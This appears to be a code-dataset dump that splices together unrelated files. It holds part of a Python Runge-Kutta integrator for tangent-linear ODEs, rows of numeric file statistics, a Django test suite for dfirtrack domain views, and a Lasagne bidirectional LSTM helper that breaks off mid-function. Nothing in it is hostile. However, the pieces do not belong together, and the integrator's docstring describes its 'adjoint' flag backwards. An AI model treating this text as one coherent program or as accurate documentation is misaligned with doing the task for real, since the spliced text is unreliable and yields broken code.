def integrate(self, t0, t, dt, ic=None, tg_ic=None, forward=True, adjoint=False, inverse=False, boundary=None,
write_steps=1):
"""Integrate simultaneously the non-linear and linearized ordinary differential equations (ODEs)
.. math:: \dot{\\boldsymbol{x}} = \\boldsymbol{f}(t, \\boldsymbol{x})
and
.. math :: \dot{\\boldsymbol{\delta x}} = \\boldsymbol{\mathrm{J}}(t, \\boldsymbol{x}) \cdot \\boldsymbol{\delta x}
with a specified `Runge-Kutta method`_ and workers.
The function :math:`\\boldsymbol{f}` is the `Numba`_ jitted function stored in :attr:`func`.
The function :math:`\\boldsymbol{J}` is the `Numba`_ jitted function stored in :attr:`func_jac`.
The result of the integration can be obtained afterward by calling :meth:`get_trajectories`.
.. _Runge-Kutta method: https://en.wikipedia.org/wiki/Runge%E2%80%93Kutta_methods
.. _Numba: https://numba.pydata.org/
.. _fundamental matrix of solutions: https://en.wikipedia.org/wiki/Fundamental_matrix_(linear_differential_equation)
Parameters
----------
t0: float
Initial time of the time integration. Corresponds to the initial condition's `ic` time.
Important if the ODEs are non-autonomous.
t: float
Final time of the time integration. Corresponds to the final condition.
Important if the ODEs are non-autonomous.
dt: float
Timestep of the integration.
ic: None or ~numpy.ndarray(float), optional
Initial condition of the system. Can be a 1D or a 2D array:
* 1D: Provide a single initial condition.
Should be of shape (`n_dim`,) where `n_dim` = :math:`\mathrm{dim}(\\boldsymbol{x})`.
* 2D: Provide an ensemble of initial condition.
Should be of shape (`n_traj`, `n_dim`) where `n_dim` = :math:`\mathrm{dim}(\\boldsymbol{x})`,
and where `n_traj` is the number of initial conditions.
If `None`, use the initial conditions stored in :attr:`ic`.
If then :attr:`ic` is `None`, use a zero initial condition.
Default to `None`.
tg_ic: None or ~numpy.ndarray(float), optional
Initial condition of the linear ODEs
:math:`\dot{\\boldsymbol{\delta x}} = \\boldsymbol{\mathrm{J}}(t, \\boldsymbol{x}) \cdot \\boldsymbol{\delta x}`. \n
Can be a 1D, a 2D or a 3D array:
* 1D: Provide a single initial condition. This initial condition of the linear ODEs will be the same used for each
initial condition `ic` of the ODEs :math:`\dot{\\boldsymbol{x}} = \\boldsymbol{f}(t, \\boldsymbol{x})`
Should be of shape (`n_dim`,) where `n_dim` = :math:`\mathrm{dim}(\\boldsymbol{x})`.
* 2D: Two sub-cases:
+ If `tg_ic.shape[0]`=`ic.shape[0]`, assumes that each initial condition `ic[i]` of :math:`\dot{\\boldsymbol{x}} = \\boldsymbol{f}(t, \\boldsymbol{x})`,
correspond to a different initial condition `tg_ic[i]`.
+ Else, assumes and integrate an ensemble of `n_tg_traj` initial condition of the linear ODEs for each
initial condition of :math:`\dot{\\boldsymbol{x}} = \\boldsymbol{f}(t, \\boldsymbol{x})`.
* 3D: An array of shape (`n_traj`, `n_tg_traj`, `n_dim`) which provide an ensemble of `n_tg_ic` initial conditions
specific to each of the `n_traj` initial conditions of :math:`\dot{\\boldsymbol{x}} = \\boldsymbol{f}(t, \\boldsymbol{x})`.
If `None`, use the identity matrix as initial condition, returning the `fundamental matrix of solutions`_ of the
linear ODEs.
Default to `None`.
forward: bool, optional
If true, integrate the ODEs forward in time, else, integrate backward in time. In case of backward integration, the
initial condition `ic` becomes a final condition. Default to forward integration.
adjoint: bool, optional
If true, integrate the tangent :math:`\dot{\\boldsymbol{\delta x}} = \\boldsymbol{\mathrm{J}}(t, \\boldsymbol{x}) \cdot \\boldsymbol{\delta x}` ,
else, integrate the adjoint linear model :math:`\dot{\\boldsymbol{\delta x}} = \\boldsymbol{\mathrm{J}}^T(t, \\boldsymbol{x}) \cdot \\boldsymbol{\delta x}`.
Integrate the tangent model by default.
inverse: bool, optional
Wheter or not to invert the Jacobian matrix
:math:`\\boldsymbol{\mathrm{J}}(t, \\boldsymbol{x}) \\rightarrow \\boldsymbol{\mathrm{J}}^{-1}(t, \\boldsymbol{x})`.
`False` by default.
boundary: None or callable, optional
Allow to add a inhomogeneous term to linear ODEs:
:math:`\dot{\\boldsymbol{\delta x}} = \\boldsymbol{\mathrm{J}}(t, \\boldsymbol{x}) \cdot \\boldsymbol{\delta x} + \Psi(t, \\boldsymbol{x})`.
The boundary :math:`\Psi` should have the same signature as :math:`\\boldsymbol{\mathrm{J}}`, i.e. ``func(t, x)``.
If `None`, don't add anything (homogeneous case). `None` by default.
write_steps: int, optional
Save the state of the integration in memory every `write_steps` steps. The other intermediary
steps are lost. It determine the size of the returned objects. Default is 1.
Set to 0 to return only the final state.
"""
if self.func is None or self.func_jac is None:
print('No function to integrate defined!')
return 0
if ic is None:
if self.ic is None:
if self.n_dim is not None:
i = self.n_dim
else:
i = 1
while True:
self.ic = np.zeros(i)
try:
x = self.func(0., self.ic)
except:
i += 1
else:
break
i = len(self.func(0., self.ic))
self.ic = np.zeros(i)
else:
self.ic = ic
if len(self.ic.shape) == 1:
self.ic = self.ic.reshape((1, -1))
self.n_traj = self.ic.shape[0]
self.n_dim = self.ic.shape[1]
self.time = np.concatenate((np.arange(t0, t, dt), np.full((1,), t)))
self._write_steps = write_steps
if tg_ic is None:
tg_ic = np.eye(self.ic.shape[1])
tg_ic_sav = tg_ic.copy()
if len(tg_ic.shape) == 1:
tg_ic = tg_ic.reshape((1, -1, 1))
ict = tg_ic.copy()
for i in range(self.n_traj-1):
ict = np.concatenate((ict, tg_ic))
self.tg_ic = ict
elif len(tg_ic.shape) == 2:
if tg_ic.shape[0] == self.n_traj:
self.tg_ic = tg_ic[..., np.newaxis]
else:
tg_ic = tg_ic[np.newaxis, ...]
tg_ic = np.swapaxes(tg_ic, 1, 2)
ict = tg_ic.copy()
for i in range(self.n_traj-1):
ict = np.concatenate((ict, tg_ic))
self.tg_ic = ict
elif len(tg_ic.shape) == 3:
if tg_ic.shape[1] != self.n_dim:
self.tg_ic = np.swapaxes(tg_ic, 1, 2)
if forward:
self._time_direction = 1
else:
self._time_direction = -1
self._adjoint = adjoint
if boundary is None:
self._boundary = _zeros_func
else:
self._boundary = boundary
self._inverse = 1.
if inverse:
self._inverse *= -1.
if write_steps == 0:
self.n_records = 1
else:
tot = self.time[::self._write_steps]
self.n_records = len(tot)
if tot[-1] != self.time[-1]:
self.n_records += 1
self.recorded_traj = np.zeros((self.n_traj, self.n_dim, self.n_records))
self.recorded_fmatrix = np.zeros((self.n_traj, self.tg_ic.shape[1], self.tg_ic.shape[2], self.n_records))
for i in range(self.n_traj):
self._ics_queue.put((i, self.time, self.ic[i], self.tg_ic[i], self._time_direction, self._write_steps,
self._adjoint, self._inverse, self._boundary))
self._ics_queue.join()
for i in range(self.n_traj):
args = self._traj_queue.get()
self.recorded_traj[args[0]] = args[1]
self.recorded_fmatrix[args[0]] = args[2]
if len(tg_ic_sav.shape) == 2:
if self.recorded_fmatrix.shape[1:3] != tg_ic_sav.shape:
self.recorded_fmatrix = np.swapaxes(self.recorded_fmatrix, 1, 2)
elif len(tg_ic_sav.shape) == 3:
if tg_ic_sav.shape[1] != self.n_dim:
if self.recorded_fmatrix.shape[:3] != tg_ic_sav.shape:
self.recorded_fmatrix = np.swapaxes(self.recorded_fmatrix, 1, 2)
def get_trajectories(self):
"""Returns the result of the previous integrator integration.
Returns
-------
time, traj, tg_traj: ~numpy.ndarray
The result of the integration:
* `time` is the time at which the state of the system was saved. Array of shape (:attr:`n_records`,).
* `traj` are the saved states. 3D array of shape (:attr:`n_traj`, :attr:`n_dim`, :attr:`n_records`).
If :attr:`n_traj` = 1, a 2D array of shape (:attr:`n_dim`, :attr:`n_steps`) is returned instead.
* `tg_traj` are the saved states of the linear ODEs.
Depending on the input initial conditions of both ODEs,
it is at maximum a 4D array of shape
(:attr:`n_traj`, :attr:`n_tg_traj`, :attr:`n_dim`, :attr:`n_records`).
If one of the dimension is 1, it is squeezed.
"""
if self._write_steps > 0:
if self._time_direction == 1:
if self.time[::self._write_steps][-1] == self.time[-1]:
return self.time[::self._write_steps], np.squeeze(self.recorded_traj), \
np.squeeze(self.recorded_fmatrix)
else:
return np.concatenate((self.time[::self._write_steps], np.full((1,), self.time[-1]))), \
np.squeeze(self.recorded_traj), np.squeeze(self.recorded_fmatrix)
else:
rtime = reverse(self.time[::-self._write_steps])
if rtime[0] == self.time[0]:
return rtime, np.squeeze(self.recorded_traj), np.squeeze(self.recorded_fmatrix)
else:
return np.concatenate((np.full((1,), self.time[0]), rtime)), np.squeeze(self.recorded_traj),\
np.squeeze(self.recorded_fmatrix)
else:
return self.time[-1], np.squeeze(self.recorded_traj), np.squeeze(self.recorded_fmatrix)
def get_ic(self):
"""Returns the initial conditions of the non-linear ODEs stored in the integrator.
Returns
-------
~numpy.ndarray
The initial conditions.
"""
return self.ic
def set_ic(self, ic):
"""Direct setter for the integrator's non-linear ODEs initial conditions
Parameters
----------
ic: ~numpy.ndarray(float)
Initial condition of the system. Can be a 1D or a 2D array:
* 1D: Provide a single initial condition.
Should be of shape (`n_dim`,) where `n_dim` = :math:`\mathrm{dim}(\\boldsymbol{x})`.
* 2D: Provide an ensemble of initial condition.
Should be of shape (`n_traj`, `n_dim`) where `n_dim` = :math:`\mathrm{dim}(\\boldsymbol{x})`,
and where `n_traj` is the number of initial conditions.
"""
self.ic = ic
def get_tg_ic(self):
"""Returns the initial conditions of the linear ODEs stored in the integrator.
Returns
-------
~numpy.ndarray
The initial conditions.
"""
return self.tg_ic
def set_tg_ic(self, tg_ic):
"""Direct setter for the integrator's linear ODEs initial conditions
Parameters
----------
tg_ic: ~numpy.ndarray(float)
Initial condition of the linear ODEs
:math:`\dot{\\boldsymbol{\delta x}} = \\boldsymbol{\mathrm{J}}(t, \\boldsymbol{x}) \cdot \\boldsymbol{\delta x}`. \n
Can be a 1D, a 2D or a 3D array:
* 1D: Provide a single initial condition. This initial condition of the linear ODEs will be the same used for each
initial condition `ic` of the ODEs :math:`\dot{\\boldsymbol{x}} = \\boldsymbol{f}(t, \\boldsymbol{x})`
Should be of shape (`n_dim`,) where `n_dim` = :math:`\mathrm{dim}(\\boldsymbol{x})`.
* 2D: Two sub-cases:
+ If `tg_ic.shape[0]`=`ic.shape[0]`, assumes that each initial condition `ic[i]` of :math:`\dot{\\boldsymbol{x}} = \\boldsymbol{f}(t, \\boldsymbol{x})`,
correspond to a different initial condition `tg_ic[i]`.
+ Else, assumes and integrate an ensemble of `n_tg_traj` initial condition of the linear ODEs for each
initial condition of :math:`\dot{\\boldsymbol{x}} = \\boldsymbol{f}(t, \\boldsymbol{x})`.
* 3D: An array of shape (`n_traj`, `n_tg_traj`, `n_dim`) which provide an ensemble of `n_tg_ic` initial conditions
specific to each of the `n_traj` initial conditions of :math:`\dot{\\boldsymbol{x}} = \\boldsymbol{f}(t, \\boldsymbol{x})`.
"""
self.tg_ic = tg_ic
class TglsTrajectoryProcess(multiprocessing.Process):
""":class:`RungeKuttaTglsIntegrator`'s workers class. Allows to multi-thread time integration.
.. _Runge-Kutta method: https://en.wikipedia.org/wiki/Runge%E2%80%93Kutta_methods
.. _Numba: https://numba.pydata.org/
Parameters
----------
processID: int
Number identifying the worker.
func: callable
`Numba`_-jitted function to integrate assigned to the worker.
b: ~numpy.ndarray, optional
Vector of coefficients :math:`b_i` of the `Runge-Kutta method`_ .
c: ~numpy.ndarray, optional
Matrix of coefficients :math:`c_{i,j}` of the `Runge-Kutta method`_ .
a: or ~numpy.ndarray, optional
Vector of coefficients :math:`a_i` of the `Runge-Kutta method`_ .
ics_queue: multiprocessing.JoinableQueue
Queue to which the worker ask for initial conditions input.
traj_queue: multiprocessing.Queue
Queue to which the worker returns the integration results.
Attributes
----------
processID: int
Number identifying the worker.
func: callable
`Numba`_-jitted function to integrate assigned to the worker.
func_jac: callable
`Numba`_-jitted Jacobian matrix function to integrate assigned to the worker.
b: ~numpy.ndarray
Vector of coefficients :math:`b_i` of the `Runge-Kutta method`_ .
c: ~numpy.ndarray
Matrix of coefficients :math:`c_{i,j}` of the `Runge-Kutta method`_ .
a: ~numpy.ndarray
Vector of coefficients :math:`a_i` of the `Runge-Kutta method`_ .
ics_queue: multiprocessing.JoinableQueue
Queue to which the worker ask for initial conditions input.
traj_queue: multiprocessing.Queue
Queue to which the worker returns the integration results.
"""
def __init__(self, processID, func, func_jac, b, c, a, ics_queue, traj_queue):
super().__init__()
self.processID = processID
self.ics_queue = ics_queue
self.traj_queue = traj_queue
self.func = func
self.func_jac = func_jac
self.a = a
self.b = b
self.c = c
def run(self):
"""Main worker computing routine. Perform the time integration with the fetched initial conditons."""
while True:
args = self.ics_queue.get()
recorded_traj, recorded_fmatrix = _integrate_runge_kutta_tgls_jit(self.func, self.func_jac, args[1], args[2][np.newaxis, ...],
args[3][np.newaxis, ...], args[4], args[5],
self.b, self.c, self.a,
args[6], args[7], args[8])
self.traj_queue.put((args[0], recorded_traj, recorded_fmatrix))
self.ics_queue.task_done()
if __name__ == "__main__":
import matplotlib.pyplot as plt
from scipy.integrate import odeint
@njit
def f(t, x):
return - np.array([1., 2., 3.]) * x
def fr(x, t):
return f(t, x)
ic = np.random.randn(6).reshape(2, 3)
integrator = RungeKuttaIntegrator()
integrator.set_func(f)
integrator.integrate(0., 10., 0.01, ic=ic, write_steps=1)
time, r = integrator.get_trajectories()
t = np.arange(0., 10., 0.1)
t = np.concatenate((t[::3], np.full((1,), 10.)))
rl = list()
for i in range(ic.shape[0]):
rl.append(odeint(fr, ic[i], t).T)
plt.figure()
for i in range(ic.shape[0]):
p, = plt.plot(time, r[i, 0])
c = p.get_color()
plt.plot(t, rl[i][0], color=c, ls='--')
for j in range(1, ic.shape[1]):
p, = plt.plot(time, r[i, j], color=c)
plt.plot(t, rl[i][j], color=c, ls='--')
plt.title('Forward')
integrator.integrate(0., 10., 0.01, ic=ic, forward=False, write_steps=1)
timet, rt = integrator.get_trajectories()
rlt = list()
for i in range(ic.shape[0]):
rlt.append(odeint(fr, ic[i], reverse(t)).T)
plt.figure()
for i in range(ic.shape[0]):
p, = plt.plot(timet, rt[i, 0])
c = p.get_color()
plt.plot(t, reverse(rlt[i][0]), color=c, ls='--')
for j in range(1, ic.shape[1]):
p, = plt.plot(timet, rt[i, j], color=c)
plt.plot(t, reverse(rlt[i][j]), color=c, ls='--')
plt.title('Backward')
integrator.integrate(0., 10., 0.01, ic=ic, write_steps=0)
tt, re = integrator.get_trajectories()
print(tt)
print(r[0, :, -1], re[0])
plt.show(block=False)
a = 0.25
F = 16.
G = 3.
b = 6.
@njit
def fL84(t, x):
xx = -x[1] ** 2 - x[2] ** 2 - a * x[0] + a * F
yy = x[0] * x[1] - b * x[0] * x[2] - x[1] + G
zz = b * x[0] * x[1] + x[0] * x[2] - x[2]
return np.array([xx, yy, zz])
@njit
def DfL84(t, x):
return np.array([[ -a , -2. * x[1], -2. * x[2]],
[x[1] - b * x[2], -1. + x[0], -b * x[0]],
[b * x[1] + x[2], b * x[0], -1. + x[0]]])
integrator.set_func(fL84)
integrator.integrate(0., 10000., 0.01, write_steps=0)
tt, traj = integrator.get_trajectories()
integrator.integrate(0.,20.,0.01,ic=traj, write_steps=10)
tt, traj = integrator.get_trajectories()
integrator.integrate(0.,20.,0.01,ic=traj[:,-1],write_steps=10, forward=False)
ttb, trajb = integrator.get_trajectories()
plt.figure()
plt.plot(tt, traj[0])
plt.plot(ttb, trajb[0])
plt.show(block=False)
plt.title('Lorenz 63 - Forward then backward')
integrator.integrate(0., 10000., 0.01, write_steps=0)
tt, traj = integrator.get_trajectories()
integrator.integrate(0.,20.,0.01,ic=traj,write_steps=10, forward=False)
tt, trajb = integrator.get_trajectories()
integrator.integrate(0.,20.,0.01,ic=trajb[:,0],write_steps=10)
ttb, traj = integrator.get_trajectories()
plt.figure()
plt.plot(tt, traj[0])
plt.plot(ttb, trajb[0])
plt.show(block=False)
plt.title('Lorenz 63 - Backward then forward')
integrator.terminate()
tgls_integrator = RungeKuttaTglsIntegrator()
tgls_integrator.set_func(fL84, DfL84)
@njit
def tboundary(t, x):
return np.array([0.,x[1],0.])
ic = np.random.randn(4, 3)
tgls_integrator.initialize(10., 0.01, ic=ic)
tgls_integrator.integrate(0., 20., 0.01, write_steps=10, tg_ic=np.zeros(3), boundary=tboundary)
# x, fm = _integrate_runge_kutta_tgls_jit(fL84, DfL84, tgls_integrator.time, tgls_integrator.ic[0][np .newaxis,...], np.zeros((1,3,1)), 1, 1, tgls_integrator.b, tgls_integrator.c, tgls_integrator.a, False, 1., tboundary)
t, x, fm = tgls_integrator.get_trajectories()
tgls_integrator.terminate()
| 41.340458
| 224
| 0.585272
| 7,124
| 54,156
| 4.334082
| 0.056148
| 0.015222
| 0.022801
| 0.015546
| 0.892732
| 0.868312
| 0.852539
| 0.845284
| 0.833269
| 0.825917
| 0
| 0.013537
| 0.30161
| 54,156
| 1,309
| 225
| 41.37204
| 0.802813
| 0.507608
| 0
| 0.730909
| 0
| 0
| 0.007037
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.056364
| false
| 0
| 0.012727
| 0.007273
| 0.112727
| 0.007273
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1691db90f2766019b98b43b0c672eb39be9705bf
| 7,266
|
py
|
Python
|
dfirtrack_main/tests/domain/test_domain_views.py
|
blackhatethicalhacking/dfirtrack
|
9c2e13015291f2981d14d63c9683e7c447e91f3a
|
[
"MIT"
] | 4
|
2020-03-06T17:37:09.000Z
|
2020-03-17T07:50:55.000Z
|
dfirtrack_main/tests/domain/test_domain_views.py
|
blackhatethicalhacking/dfirtrack
|
9c2e13015291f2981d14d63c9683e7c447e91f3a
|
[
"MIT"
] | null | null | null |
dfirtrack_main/tests/domain/test_domain_views.py
|
blackhatethicalhacking/dfirtrack
|
9c2e13015291f2981d14d63c9683e7c447e91f3a
|
[
"MIT"
] | 1
|
2020-03-06T20:54:52.000Z
|
2020-03-06T20:54:52.000Z
|
from django.contrib.auth.models import User
from django.test import TestCase
from dfirtrack_main.models import Domain
import urllib.parse
class DomainViewTestCase(TestCase):
""" domain view tests """
@classmethod
def setUpTestData(cls):
# create object
Domain.objects.create(domain_name='domain_1')
# create user
test_user = User.objects.create_user(username='testuser_domain', password='jjSeshxL17aDEdqkt8tP')
def test_domains_list_not_logged_in(self):
""" test list view """
# create url
destination = '/login/?next=' + urllib.parse.quote('/domains/', safe='')
# get response
response = self.client.get('/domains/', follow=True)
# compare
self.assertRedirects(response, destination, status_code=302, target_status_code=200)
def test_domains_list_logged_in(self):
""" test list view """
# login testuser
login = self.client.login(username='testuser_domain', password='jjSeshxL17aDEdqkt8tP')
# get response
response = self.client.get('/domains/')
# compare
self.assertEqual(response.status_code, 200)
def test_domains_list_template(self):
""" test list view """
# login testuser
login = self.client.login(username='testuser_domain', password='jjSeshxL17aDEdqkt8tP')
# get response
response = self.client.get('/domains/')
# compare
self.assertTemplateUsed(response, 'dfirtrack_main/domain/domains_list.html')
def test_domains_list_get_user_context(self):
""" test list view """
# login testuser
login = self.client.login(username='testuser_domain', password='jjSeshxL17aDEdqkt8tP')
# get response
response = self.client.get('/domains/')
# compare
self.assertEqual(str(response.context['user']), 'testuser_domain')
def test_domains_detail_not_logged_in(self):
""" test detail view """
# get object
domain_1 = Domain.objects.get(domain_name='domain_1')
# create url
destination = '/login/?next=' + urllib.parse.quote('/domains/' + str(domain_1.domain_id), safe='')
# get response
response = self.client.get('/domains/' + str(domain_1.domain_id), follow=True)
# compare
self.assertRedirects(response, destination, status_code=302, target_status_code=200)
def test_domains_detail_logged_in(self):
""" test detail view """
# get object
domain_1 = Domain.objects.get(domain_name='domain_1')
# login testuser
login = self.client.login(username='testuser_domain', password='jjSeshxL17aDEdqkt8tP')
# get response
response = self.client.get('/domains/' + str(domain_1.domain_id))
# compare
self.assertEqual(response.status_code, 200)
def test_domains_detail_template(self):
""" test detail view """
# get object
domain_1 = Domain.objects.get(domain_name='domain_1')
# login testuser
login = self.client.login(username='testuser_domain', password='jjSeshxL17aDEdqkt8tP')
# get response
response = self.client.get('/domains/' + str(domain_1.domain_id))
# compare
self.assertTemplateUsed(response, 'dfirtrack_main/domain/domains_detail.html')
def test_domains_detail_get_user_context(self):
""" test detail view """
# get object
domain_1 = Domain.objects.get(domain_name='domain_1')
# login testuser
login = self.client.login(username='testuser_domain', password='jjSeshxL17aDEdqkt8tP')
# get response
response = self.client.get('/domains/' + str(domain_1.domain_id))
# compare
self.assertEqual(str(response.context['user']), 'testuser_domain')
def test_domains_add_not_logged_in(self):
""" test add view """
# create url
destination = '/login/?next=' + urllib.parse.quote('/domains/add/', safe='')
# get response
response = self.client.get('/domains/add/', follow=True)
# compare
self.assertRedirects(response, destination, status_code=302, target_status_code=200)
def test_domains_add_logged_in(self):
""" test add view """
# login testuser
login = self.client.login(username='testuser_domain', password='jjSeshxL17aDEdqkt8tP')
# get response
response = self.client.get('/domains/add/')
# compare
self.assertEqual(response.status_code, 200)
def test_domains_add_template(self):
""" test add view """
# login testuser
login = self.client.login(username='testuser_domain', password='jjSeshxL17aDEdqkt8tP')
# get response
response = self.client.get('/domains/add/')
# compare
self.assertTemplateUsed(response, 'dfirtrack_main/domain/domains_add.html')
def test_domains_add_get_user_context(self):
""" test add view """
# login testuser
login = self.client.login(username='testuser_domain', password='jjSeshxL17aDEdqkt8tP')
# get response
response = self.client.get('/domains/add/')
# compare
self.assertEqual(str(response.context['user']), 'testuser_domain')
def test_domains_edit_not_logged_in(self):
""" test edit view """
# get object
domain_1 = Domain.objects.get(domain_name='domain_1')
# create url
destination = '/login/?next=' + urllib.parse.quote('/domains/' + str(domain_1.domain_id) + '/edit/', safe='')
# get response
response = self.client.get('/domains/' + str(domain_1.domain_id) + '/edit/', follow=True)
# compare
self.assertRedirects(response, destination, status_code=302, target_status_code=200)
def test_domains_edit_logged_in(self):
""" test edit view """
# get object
domain_1 = Domain.objects.get(domain_name='domain_1')
# login testuser
login = self.client.login(username='testuser_domain', password='jjSeshxL17aDEdqkt8tP')
# get response
response = self.client.get('/domains/' + str(domain_1.domain_id) + '/edit/')
# compare
self.assertEqual(response.status_code, 200)
def test_domains_edit_template(self):
""" test edit view """
# get object
domain_1 = Domain.objects.get(domain_name='domain_1')
# login testuser
login = self.client.login(username='testuser_domain', password='jjSeshxL17aDEdqkt8tP')
# get response
response = self.client.get('/domains/' + str(domain_1.domain_id) + '/edit/')
# compare
self.assertTemplateUsed(response, 'dfirtrack_main/domain/domains_edit.html')
def test_domains_edit_get_user_context(self):
""" test edit view """
# get object
domain_1 = Domain.objects.get(domain_name='domain_1')
# login testuser
login = self.client.login(username='testuser_domain', password='jjSeshxL17aDEdqkt8tP')
# get response
response = self.client.get('/domains/' + str(domain_1.domain_id) + '/edit/')
# compare
self.assertEqual(str(response.context['user']), 'testuser_domain')
| 37.84375
| 117
| 0.645747
| 809
| 7,266
| 5.60445
| 0.080346
| 0.061756
| 0.05161
| 0.081165
| 0.905382
| 0.874283
| 0.862153
| 0.853772
| 0.788266
| 0.780326
| 0
| 0.018273
| 0.231764
| 7,266
| 191
| 118
| 38.041885
| 0.793981
| 0.131159
| 0
| 0.54321
| 0
| 0
| 0.169348
| 0.025516
| 0
| 0
| 0
| 0
| 0.197531
| 1
| 0.209877
| false
| 0.160494
| 0.049383
| 0
| 0.271605
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
bca7648bb5abba00f5783b0b88a01388e80e830a
| 24,382
|
py
|
Python
|
FnB_LSTM.py
|
biolib/deepclip
|
06e0a3c431db76745b6674afabc4d171f19b3eb0
|
[
"MIT"
] | 7
|
2019-07-23T10:20:11.000Z
|
2022-03-14T14:46:13.000Z
|
FnB_LSTM.py
|
biolib/deepclip
|
06e0a3c431db76745b6674afabc4d171f19b3eb0
|
[
"MIT"
] | 10
|
2019-09-05T22:45:04.000Z
|
2022-03-21T08:40:49.000Z
|
FnB_LSTM.py
|
biolib/deepclip
|
06e0a3c431db76745b6674afabc4d171f19b3eb0
|
[
"MIT"
] | 5
|
2019-07-23T10:20:46.000Z
|
2021-11-14T07:18:05.000Z
|
# -*- coding: utf-8 -*-
import lasagne
def FnB_LSTM(inp_forw, inp_backw, N_LSTM, DROPOUT_LSTM, GRAD_CLIP, forget_b, ing=0.0, cellg=0.0, outg=0., learn_init=False, peepholes=False):
l_forward_1 = lasagne.layers.LSTMLayer(
inp_forw,
N_LSTM,
ingate=lasagne.layers.Gate(
W_in=lasagne.init.Uniform(),
W_hid=lasagne.init.Uniform(),
W_cell=lasagne.init.Uniform(),
b=lasagne.init.Constant(ing),
nonlinearity=lasagne.nonlinearities.sigmoid
),
forgetgate=lasagne.layers.Gate(
W_in=lasagne.init.Uniform(),
W_hid=lasagne.init.Uniform(),
W_cell=lasagne.init.Uniform(),
b=lasagne.init.Constant(forget_b),
nonlinearity=lasagne.nonlinearities.sigmoid
),
cell=lasagne.layers.Gate(
W_in=lasagne.init.Uniform(),
W_hid=lasagne.init.Uniform(),
W_cell=None,
b=lasagne.init.Constant(cellg),
nonlinearity=lasagne.nonlinearities.sigmoid
),
outgate=lasagne.layers.Gate(
W_in=lasagne.init.Uniform(),
W_hid=lasagne.init.Uniform(),
W_cell=lasagne.init.Uniform(),
b=lasagne.init.Constant(outg),
nonlinearity=lasagne.nonlinearities.sigmoid
),
nonlinearity=lasagne.nonlinearities.tanh,
grad_clipping=GRAD_CLIP,
backwards=False,
learn_init=False,
peepholes=False
)
l_backward_1 = lasagne.layers.LSTMLayer(
inp_backw,
N_LSTM,
ingate=lasagne.layers.Gate(
W_in=lasagne.init.Uniform(),
W_hid=lasagne.init.Uniform(),
W_cell=lasagne.init.Uniform(),
b=lasagne.init.Constant(ing),
nonlinearity=lasagne.nonlinearities.sigmoid
),
forgetgate=lasagne.layers.Gate(
W_in=lasagne.init.Uniform(),
W_hid=lasagne.init.Uniform(),
W_cell=lasagne.init.Uniform(),
b=lasagne.init.Constant(forget_b),
nonlinearity=lasagne.nonlinearities.sigmoid
),
cell=lasagne.layers.Gate(
W_in=lasagne.init.Uniform(),
W_hid=lasagne.init.Uniform(),
W_cell=None,
b=lasagne.init.Constant(cellg),
nonlinearity=lasagne.nonlinearities.sigmoid
),
outgate=lasagne.layers.Gate(
W_in=lasagne.init.Uniform(),
W_hid=lasagne.init.Uniform(),
W_cell=lasagne.init.Uniform(),
b=lasagne.init.Constant(outg),
nonlinearity=lasagne.nonlinearities.sigmoid
),
nonlinearity=lasagne.nonlinearities.tanh, # (or linear)
grad_clipping=GRAD_CLIP,
backwards=True,
learn_init=False,
peepholes=False
)
l_fordrop1 = lasagne.layers.DropoutLayer(l_forward_1, p=DROPOUT_LSTM)
l_backdrop1 = lasagne.layers.DropoutLayer(l_backward_1, p=DROPOUT_LSTM)
return l_fordrop1, l_backdrop1
def FnB_LSTM_tanh(inp_forw, inp_backw, N_LSTM, DROPOUT_LSTM, GRAD_CLIP, forget_b, ing=0., cellg=0., outg=0., learn_init=False, peepholes=False):
l_forward_1 = lasagne.layers.LSTMLayer(
inp_forw,
N_LSTM,
ingate=lasagne.layers.Gate(
W_in=lasagne.init.Uniform(),
W_hid=lasagne.init.Uniform(),
W_cell=lasagne.init.Uniform(),
b=lasagne.init.Constant(ing),
nonlinearity=lasagne.nonlinearities.sigmoid
),
forgetgate=lasagne.layers.Gate(
W_in=lasagne.init.Uniform(),
W_hid=lasagne.init.Uniform(),
W_cell=lasagne.init.Uniform(),
b=lasagne.init.Constant(forget_b),
nonlinearity=lasagne.nonlinearities.sigmoid
),
cell=lasagne.layers.Gate(
W_in=lasagne.init.Uniform(),
W_hid=lasagne.init.Uniform(),
W_cell=None,
b=lasagne.init.Constant(cellg),
nonlinearity=lasagne.nonlinearities.tanh
),
outgate=lasagne.layers.Gate(
W_in=lasagne.init.Uniform(),
W_hid=lasagne.init.Uniform(),
W_cell=lasagne.init.Uniform(),
b=lasagne.init.Constant(outg),
nonlinearity=lasagne.nonlinearities.sigmoid
),
nonlinearity=lasagne.nonlinearities.tanh,
grad_clipping=GRAD_CLIP,
backwards=False,
learn_init=False,
peepholes=False
)
l_backward_1 = lasagne.layers.LSTMLayer(
inp_backw,
N_LSTM,
ingate=lasagne.layers.Gate(
W_in=lasagne.init.Uniform(),
W_hid=lasagne.init.Uniform(),
W_cell=lasagne.init.Uniform(),
b=lasagne.init.Constant(ing),
nonlinearity=lasagne.nonlinearities.sigmoid
),
forgetgate=lasagne.layers.Gate(
W_in=lasagne.init.Uniform(),
W_hid=lasagne.init.Uniform(),
W_cell=lasagne.init.Uniform(),
b=lasagne.init.Constant(forget_b),
nonlinearity=lasagne.nonlinearities.sigmoid
),
cell=lasagne.layers.Gate(
W_in=lasagne.init.Uniform(),
W_hid=lasagne.init.Uniform(),
W_cell=None,
b=lasagne.init.Constant(cellg),
nonlinearity=lasagne.nonlinearities.tanh
),
outgate=lasagne.layers.Gate(
W_in=lasagne.init.Uniform(),
W_hid=lasagne.init.Uniform(),
W_cell=lasagne.init.Uniform(),
b=lasagne.init.Constant(outg),
nonlinearity=lasagne.nonlinearities.sigmoid
),
nonlinearity=lasagne.nonlinearities.tanh,
grad_clipping=GRAD_CLIP,
backwards=True,
learn_init=False,
peepholes=False
)
l_fordrop1 = lasagne.layers.DropoutLayer(l_forward_1, p=DROPOUT_LSTM)
